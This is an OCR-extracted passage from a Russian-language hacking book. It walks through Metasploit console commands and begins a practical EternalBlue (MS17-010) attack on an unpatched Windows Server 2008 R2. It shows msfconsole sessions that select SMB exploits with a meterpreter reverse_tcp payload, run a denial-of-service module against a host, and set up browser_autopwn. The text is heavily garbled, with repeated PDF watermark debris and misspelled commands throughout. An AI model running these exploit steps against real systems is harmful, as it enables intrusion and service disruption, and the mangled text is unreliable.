Добавил:
Опубликованный материал нарушает ваши авторские права? Сообщите нам.
Вуз: Предмет: Файл:

книги хакеры / Что такое хакинг

.pdf
Скачиваний:
20
Добавлен:
19.04.2024
Размер:
30.29 Mб
Скачать

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

m

loadpath

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

 

 

.

 

f-xchanpath

 

 

 

 

 

 

 

 

.c

 

 

 

 

p

d

 

 

 

 

e

 

 

 

 

 

 

 

 

 

g

 

 

 

 

quit resource

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

 

F

 

 

 

 

 

 

t

 

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

r

 

 

P

 

 

 

 

 

NOW!

o

1 1ав.1 .... (

l'l,Jll' 11.1 \ll-ta,pl111I

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

Searches for and loads modules from а

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

-x cha

 

 

 

 

Exit the console

 

 

 

 

 

 

 

 

 

 

 

 

Run the commands stored in а

file

 

 

 

 

 

 

 

 

 

 

 

Примечание. Здесь и далее мы будем опускать часть вывода Metasploit, поскольку его консоль может генерировать довольно

длинный вывод, который публиковать в книге особо не хочется.

7.7.2. Команда use- выбор модуля для использования

Команда use позволяет использовать выбрать для работы определенный мо­ дуль, например:

use exploit/windows/smЬ/ms

use exploit/windows/smЬ/msOЗ 049_netapi use exploit/windows/smЬ/ms04_007_killbill use exploit/windows/smЬ/ms04 011 lsass

Рис. 7. 7. Команда use

Примечание. Одна из особенностей консоли - автозавершение

команд, подобно тому, которое используется в командной строке

Linux. Просто начни вводить текст, а затем нажми ТаЬ и консоль или дополнит твою команду или предложит несколько вариан-

тов.

, _ - - -- ----- - -- - -

_·_ - - ----- ------ --- --- --- - -- --- -- -- --- --- --- -- - ---

. -- - -- - -- --- -- - -

111

The "none" Encoder XOR Encoder

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

 

i

 

 

 

F

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

t

 

 

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

 

o

 

P

D

 

 

 

 

 

 

 

 

o

 

 

 

 

NOW!

r

 

 

 

 

 

NOW!

r

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

7.7.3. Команда show- показ сущностей

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

m

w Click

 

 

 

 

 

 

o

w Click

 

 

 

 

 

 

o

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

.

 

 

 

 

 

 

.c

 

 

 

p

df

 

 

 

 

e

 

 

 

 

p

df

 

 

 

 

e

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

 

 

n

 

 

 

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

 

-x cha

 

 

 

 

 

Команда show покажет все доступные сущности (модули, опции, цели и т.д.). Команде show нужно передать тип сущности или слово all, чтобы вывести все установленные модули. Вывод команды show а//:

msfб > show all Encoders

Name

Description

cmd/generic sh

Generic Shell VariaЫe

Substitution Command Encoder generic/none mipsbe/longxor

Вывод очень большой и может продолжаться несколько минут. Поэтому луч­ ше всего изучать список модулей по rруппам. Доступны следующие rруппы:

encoders

nops

exploits

payloads

auxiliary

post

plugins

Также в конце вывода show а// выводится список установленных плагинов:

[*] AvailaЫe Framework plugins * nessus

* rssfeed

*sqlmap

*sounds

*auto add route

*request

*aggregator

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

 

X

 

 

 

 

 

 

 

 

 

-

 

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

 

w Click

 

 

 

 

 

 

*m

rnsgrpc

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

f-xchan

 

 

o

*

rnsfd

 

.

 

 

.c

 

 

p

d

 

 

 

 

 

e

 

 

 

 

 

 

 

 

 

g

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

*

nexpose

 

 

 

 

 

 

 

 

 

 

 

 

*

db credcollect

 

 

 

 

 

 

 

 

 

 

 

 

*

libnotify

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

*thread

*alias

*session_tagger

*token adduser

*pcap_log

*sarnple

*beholder

*socket_logger

*openvas

*ernap

*wiki

*even.t tester

*token hunter

*ffautoregen

*session notifier

*lab

*db tracker * ips_filter

Наиболее часто тыбудешь использовать команды:

show auxiliary show exploits show payloads

Выполнение show auxiliary, отобразит распечатку всех доступных вспомога­ тельных модулей в пределах Metasploit. Как упомянуто более ранние, вспо­ могательные модули включают сканеры, модули отказа в обслуживании, fuzzers, и больше.

Команда show exploits будет для тебя самая интересная. Выполни show ex­ ploits, чтобы получить есть распечатку про все эксплойты, связанные в од­ ной.логической среде.

Выполнение show payloads покажет все полезные нагрузки для всех плат­ форм, доступных в пределах Metasploit. Команда show options покажет на­ стройки модуля, если ты выбрал конкретный модуль. ...

Рассмотримнебольшой пример:

. ............................................ .......... . ..........................

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

F

 

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

D

 

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

msf6>m

use exploit/windows/smЬ/ms03_049_netapi

w Click

 

 

 

 

 

 

m

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

w

 

 

-x cha

 

 

 

o

 

 

.

 

-xcha[*] Using configured payload windows/meterpreter/reserse tcp

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

msf6> show options

Module options (exploit/windows/smЬ/ms0З 049_netapi):

Name

 

Current Setting

Required

Description

RHOSTS

yes

The target

host (s), range...

RPORT

445

yes

The SMB service port

(ТСР)

 

 

 

 

 

SMBPIPEBROWSER

yes

The pipe name to use

(BROWSER...

 

 

 

Payload options (windows/meterpreter/reserse_tcp):

Name

 

Current Setting

Required

Description

EXITFUNC thread

yes

Exit technique

(Accepted...

 

 

 

LHOST

192.168.84.136

yes

The listen

address

 

(an interf_

 

 

LPORT

4444

yes

The listen port

Exploit target:

 

 

 

Id

Name

 

 

 

О

Windows ХР

SP0/SPl

 

 

showpayloads,

CompatiЫe Payloads

 

 

#

Name

Disclosure Date Rank

Check

Description

О

generic/custom

normal

No

Custom Payload

 

 

1

generic/debug_trap

normal

No

Generic х86

Deb...

 

 

show targets

Exploit targets:

-··················································································

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

 

o

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

 

Idm

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

o

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

О

 

 

 

 

-xcha

 

 

 

 

Name

Windows ХР SP0/SPl

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

1 1.111.1 "'. ( Lчн·11.1 \ll'!.1,ploil

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Это довольно старенький эксruюйт. Давай посмотрим на более новые ва­ рианты. Для этого используем команду search. Будем искать по названию уязвимости - ethemalЫue:

msfб>search eternalЫue Matching Modules

Name

Disclosure Date Rank

Check

Description

 

auxiliary/admin/smЬ/ms17 010 command 2017-03-14

normal

Yes

MSl7-010...

 

auxiliary/scanner/smЬ/smЬ_ms17 010

normal

Yes

MS17-010_

 

exploit/windows/smЬ/ms17 0l0_eternalЬlue 2017-03-14

average

No

MS17-010_

 

exploit/windows/smЬ/ms17_010_eternalЬlue_win8 2017-03-14

average No ...

Попробуем использовать этот эксплойт:

back

use exploit/windows/smЬ/msl7 010 ethernalЫue show targets

Exploit target:

Id Name

ОWindows 7 and Server 2008 R2 (хб4) All Service Packs

Этот эксплойт уже посвежее. Также есть аналогичный эксплойт для Windows 8.

Команда info выведет подробную информацию о специфическом модуле, включая все опции, цели, и другую информацию:

msf > info dos/windows/smЬ/ms09 001 write

Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset

Version: 6890

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

 

w Click

 

 

 

 

 

m

License: Metasploit Framework License (BSD)

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-xcha

 

 

 

 

 

Provided Ьу: j.v.vallejo

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Когда ты выбрал конкретный модуль, для его использования применяй ко­ манду use. Обрати внимание в выводе ниже на.глобальную переменную, ко­ торая была установлена, в ранее уже установленной конфигурации (RPORT).

use dos/windows/smЬ/ms09 001 write

msf auxiliary(ms09 00l_write) > show options Module options:

Name

Current Setting

Required

Description

 

RHOST

 

yes

The

target address

RPORT

445

yes

Set

the SMB

service

port

Команда connect позволяет соединиться с IР-адресом (по номеру порта) из msfconsole так же, как будто бы ты используешь netcat или telnet:

connect 192.168.1.1 23

[*] Connected to 192.168.1.1:23 Hello

DD-WRT v44 std (с) 2018 NewMedia-NET GmЬH Release: 07/27/18 (SVN revision: 20011) DD-WRT login:

7.7.4. Команды set и setg - установка значений переменных

Команда set позволяет установить опцию модуля. Команда setg устанавлива­ ет глобальную опцию, заданное значение будет доступно для всех модулей.

Установить значение опции можно так:

set RHOST 192.168.1.1 RHOST => 192.168.1.1

msf auxiliary(ms09 00l_write) > show options

Module options:

 

-

..........................

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

Narne Current Setting Required Description

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

RHOST

192.168.1.1

yes

The

target address

RPORT

445

yes

Set

the SMB service

port

 

 

 

 

Для

 

setg,

 

 

 

 

 

для

unsetg

для

 

для

rnsf6 > setg LHOST 192.168.1.101 LHOST => 192.168.1.101

msf6 > setg RHOSTS 192.168.1.0/24 RHOSTS => 192.168.1.0/24

msf6 > setg RHO$T 192.168.1.136 RHOST => 192.168.1.136

msf6 > save

Saved configuration to: /root/.msf6/config msf6 >

save.

7.7.5. 1':оманда check - проверка целевой системы

check,

msf6 exploit(ms04 045_wins) > show options

Module options:

' Name Current Setting

.. - ... ·-. - ·--- --- --- - - -.. - - .--- - - .-- .

Required Description ...

-... - . -- - . - - . ·-. - .- - - . - -- - . ---- - - ...-- --- -

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

t

 

P

D

 

 

 

 

 

 

 

o

 

 

 

 

NOW!

r

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

m

w Click

 

 

n

 

o

 

w

 

df

 

 

 

RHOST

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

-xcha

 

e

 

 

 

 

 

 

 

 

RPORT

 

 

 

 

 

 

 

 

 

 

192.168.1.114

yes

42

yes

The target address The target port

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Exploit target:.

Id Name

ОWindows 2000 English

msf6 exploit(ms04_045_wins) > check

[-] Check failed: The connectio was refused Ьу the remote host (192.168.1.114:42)

В данном случае целевая система не годится для проверки, поскольку соеди­ нение бьmо закрыто удаленным узлом.

7.7.6. Команда back- возврат

Когда ты закончишь работу с определенным модулем, введи команду back для возврата обратно. Дальше ты сможешь выбрать другой модуль и про­

должить работу.

7.7.7. Команда run - запуск эксплойта

Запустить подготовленный эксплойт можно командой run:

msf6 auxiliary(ms09 00l_write) > run

Attempting to crash the remote host...

datalenlow=65535 dataoffset=65535 filleisize=72 rescue

datalenlow=55535 dataoffset=65535 fillersize=72 rescue

datalenlow=45535 dataoffset=65535 fillersize=72 rescue

datalenlow=35535 dataoffset=65535 fillersize=72 rescue

datalenlow=25535 dataoffset=65535 fillersize=72 rescue

11118- ---- - . - - .-.--.-.--. - - - - .---.----.---..-------..--.----.-------. - - .-- ---- . ----_,

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-xcha

 

 

 

 

 

 

 

 

 

hang

e

 

 

 

 

 

 

 

 

C

 

E

 

 

 

 

 

X

 

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

 

F

 

 

 

 

 

 

t

 

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

 

r

 

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

 

to

 

 

 

 

 

7.7.8. Команда resource - определение ресурса

w Click

 

 

 

 

 

m

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

.

 

 

 

 

 

.c

 

 

 

 

p

 

 

 

 

g

 

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

-x cha

 

 

 

 

resource.

msfб > resource karma.rc resource> load dЬ_sqliteЗ [-]

[-] The functionality previous1y provided Ьу this plugin has been

[-] integrated into the core comrnand set. Use the new 'db driver'

[-] comrnand to use а database driver other than sqliteЗ (which

[-] is now the default). All of the old comrnands are the same.

[-]

[-] Failed to load plugin from /pentest/exploits/ framework3/plugins/db_sqlite3: Deprecated plugin resource> db create /root/karma.db

[*]The specified database already exists, connecting [*] Successful1·у connected to the database

[*]File: /root/karma.db

resource> use auxiliary/server/browser_autopwn resource> setg AUTOPWN_HOST 1О. О..О.1

AUTOPWN HOST => 10.0.0.1

7.7.9. Команда irb

Ruby,

msfб > irb

[*]Starting IRB shell...

[*]You are in the "framework" object

>> p ts «Hello, metasploit!» Hello, metasploit!

··················································································tD

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

 

.

 

7.8. Практический пример 1: взламываем

 

 

 

w Click

 

 

 

 

 

 

m

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

 

p

 

 

 

 

 

.c

 

 

 

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

 

старенький сервер Windows 2008 с помощью

 

 

 

 

-xcha

 

 

 

 

эксплойта АНБ

 

 

 

 

hang

e

 

 

 

 

 

 

 

C

 

E

 

 

 

 

X

 

 

 

 

 

 

-

 

 

 

 

 

d

 

 

F

 

 

 

 

 

 

t

 

 

D

 

 

 

 

 

 

 

i

 

 

 

 

 

 

 

 

 

r

P

 

 

 

 

 

NOW!

o

 

 

 

 

 

 

 

 

 

 

 

 

BUY

 

 

 

 

 

 

to

 

 

 

 

 

w Click

 

 

 

 

 

m

 

 

 

 

 

 

w

 

 

 

 

 

 

 

 

 

 

w

 

 

 

 

 

 

 

o

 

 

.

 

 

 

 

 

.c

 

 

 

p

 

 

 

 

g

 

 

 

 

 

df

 

 

n

e

 

 

 

 

 

-x cha

 

 

 

 

Наконец-то мы добрались до самого интересного. Настало время собрать все воедино и использовать изученные команды на практике. Мы будем ис­ пользовать эксплойт EtemalВlue.

EtemalВlue - это эксплойт, который, скорее всего, был разработан АНБ в ка­ честве бывшей уязвимости нулевого дня. Он был выпущен в 2017 году ха­ керской группой Shadow Brokers, которая сющдально известна утечками ин­ формации и эксплойтов из Equation Group, которая, как поговаривают, тесно связана с отделом АНБ ТАО(Tailored Access Operations).

Эксплойт EtemalВlue также известен как MSl7-010 представляет собой уяз­ вимость в протоколе Microsoft Server Message Block(SMB). SМВпозволяет системам совместно использовать доступ к файлам, принтерам и другие ре­ сурсы в сети. Уязвимость присутствует в немного устаревчшхверсиях SMB, позволяющую хакеру установить соединение с нулевым сеансом через ано­ нимный вход. Затем хакер сможет отправлять модифицированные пакеты и выполнять произвольные команды на целевой системе.

В качестве жертвы мы будем использовать старенькую и непропатченную ОС Windows Server 2008 R2. Чтобы повторить наш подвиг, тебе нужно ска­ чать такую же. Не нужно думать, что это очень старая операционка - много организаций до сих пор используют ее даже в 2020 году, поскольку ряд кри­ зисов не позволяет обновить железо и купить новый софт. Да и сама опера­ ционная система до сих пор(!) доступна для загрузки на сайте Microsoft:

https://www.microsoft.com/en-us/download/details.aspx?id=11093

По этой ссылке ты можешь скачать ее совершенно бесплатно(180-дневная версия).

Итак, запусти Metasploit. Это можно сделать или посредством графического интерфейса или командой msfconsole.

Далее мы попытаемся найти подходящие модули. Вывод мы сократили(он достаточно «широкий», чтобы поместиться на книжном листе), поэтому мы

оставили только названия модулей:

search eternalЫue

 

Matching Modules

 

18-- - - -- --- --- --- - --- ---- -------- - - --- - --------- --- ----- - --------------- ----------

'